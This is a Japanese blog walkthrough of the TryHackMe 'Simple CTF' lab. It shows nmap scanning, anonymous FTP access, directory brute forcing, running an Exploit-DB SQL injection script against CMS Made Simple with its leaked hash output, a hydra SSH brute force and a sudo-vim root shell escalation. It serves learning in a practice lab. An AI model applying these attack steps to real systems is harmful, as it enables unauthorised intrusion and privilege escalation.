[THM:Simple CTF]にチャレンジ

以下、与えられた脆弱性のあるマシーンに対して、実行してみたフローと詳細の内容になります。このやり方ですべて解答することができました。

nampnmap -p- -Pn -T4 -sV -sC <IP>21/tcp ftp vsftpd 3.0.3
80/tcp http Apache httpd 2.4.18
2222/tpc ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8
nmap –script vuln <IP>いくつかcveが見つかる。
CVE-2011-1002
CVE-2007-6750
ブラウザhttp://<IP>Apache2のデフォルトページが表示されている。
バージョン等は①で確認済み。
ftpftp <IP>anonymousでパスワード無しでログインできる。
pubディレクトリの中に、ForMitch.txtというファイルが存在。
ファイル名から、mitchというユーザーの存在を推測。
中には、「パスワードが簡単すぎる!システムユーザーのパスワードまで一緒なんて!」とコメントが
gobusterobuster dir -u <IP> -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txtsimpleといディレクトリが見つかる。
ブラウザhttp://<IP>/simpleCMS Made simpleの、CMSを利用していることが判明。クリックによりログインページも見つかる。
CMSのバージョンは、2.2.8ということも目視できる。
searchsploitsearchsploit cms made simple 2.2たくさんのエクスプリとコードが見つかる。いくつか実行。SQLiがうまくいった。
python /usr/share/exploitdb/exploits/php/webapps/46635.py -u http://<IP>/simpleエクスプロイトコードを実行。以下の結果を獲得。
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96

パスワードが2つ見つかっているが、どちらもSaltがかかっていて、johnでもhashcatでも解析不能。
john hash.txt –wordlist=/usr/share/wordlists/rockyou.txt
hashcat hash.txt /usr/share/wordlists/rockyou.txt

しかしユーザー名は判明。
hydrahydra -l mitch -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://<IP>これにより、sshのパスワードが判明した。
sshssh -p mitch@<IP>mitchでログインができる。
sudosudo -lsudo権限が付与されているコマンドを確認。vimが見つかった。
sudo vim -c ':!/bin/sh'GTFOBins をたよりに、権限昇格を実行。これで、/rootのディレクトリも見れるようになった。

個人的には、searchsploitからの cms made simple 、そしてそのexploitの実行の部分がなんだか、無理やり感を感じた。他にスマートな方法はないか気になる。

コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です